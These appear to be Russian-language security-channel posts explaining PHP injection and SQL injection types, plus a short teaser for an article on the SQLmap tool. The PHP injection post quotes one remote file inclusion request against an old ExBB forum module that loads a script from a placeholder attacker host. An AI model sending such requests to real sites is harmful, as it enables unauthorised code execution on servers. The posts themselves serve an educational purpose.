💉 PHP-инъекция: Введение

PHP-инъекция — один из способов взлома веб-сайтов, работающих на PHP. Он заключается в том, чтобы внедрить специально сформированный сценарий в код веб-приложения на серверной стороне сайта, что приводит к выполнению произвольных команд.

— Известно, что во многих распространённых в интернете бесплатных движках и форумах, работающих на PHP (чаще всего это устаревшие версии) есть непродуманные модули или отдельные конструкции с уязвимостями.

Крэкеры анализируют такие уязвимости как неэкранированные переменные, получающие внешние значения. Например, старая уязвимость форума ExBB использовалась запросом:

GET /modules/threadstop/threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt.

#PHP #Injection

💉 SQL-инъекции: что такое и чем опасны

SQL-инъекция - это уязвимость, которая позволяет злоумышленнику вмешиваться в запросы, когда приложение обращается к своей базе данных. Как правило, это позволяет просматривать данные, которые оно обычно не может получить.

Это могут быть другие пользователи, или любые другие данные, доступ к которым имеет само приложение.

— Каковы последствия успешной атаки SQL-инъекции?

Успешная атака SQL-инъекции может привести к несанкционированному доступу к конфиденциальным данным, таким как пароли, данные кредитных карт или личная информация пользователей.

❗️ Существует широкий спектр уязвимостей, атак и методов SQL-инъекций, которые возникают в различных ситуациях. Некоторые распространенные примеры инъекций SQL включают:

- Получение скрытых данных, когда вы можете изменить SQL-запрос, чтобы вернуть дополнительные результаты.
- Подрыв логики приложения, когда можно изменить запрос, чтобы вмешаться в логику приложения.
- Атаки UNION, когда можно получить данные из разных таблиц базы данных.
- Изучение базы данных, когда можно получить информацию о версии и структуре базы данных.
- Blind SQL-инъекция, когда результаты контролируемого вами запроса не возвращаются в ответах приложения.

#SQL #Injection

🌐 SQLmap | Автоматизированное оружие для поиска SQL-инъекций

SQL-инъекции остаются одной из самых опасных уязвимостей веб-приложений, и их обнаружение требует глубокого понимания работы баз данных.

SQLmap — мощный инструмент для автоматизированного поиска и эксплуатации SQL-инъекций, который значительно упрощает процесс тестирования.

Однако, несмотря на свою эффективность, он не всегда может заменить ручной анализ.

— В данной статье мы рассмотрим, как работает SQLmap, в каких случаях его стоит применять и какие нюансы важно учитывать при тестировании.

🎤 Чтиво

#SQL #Attack #Security #Injection / White Hat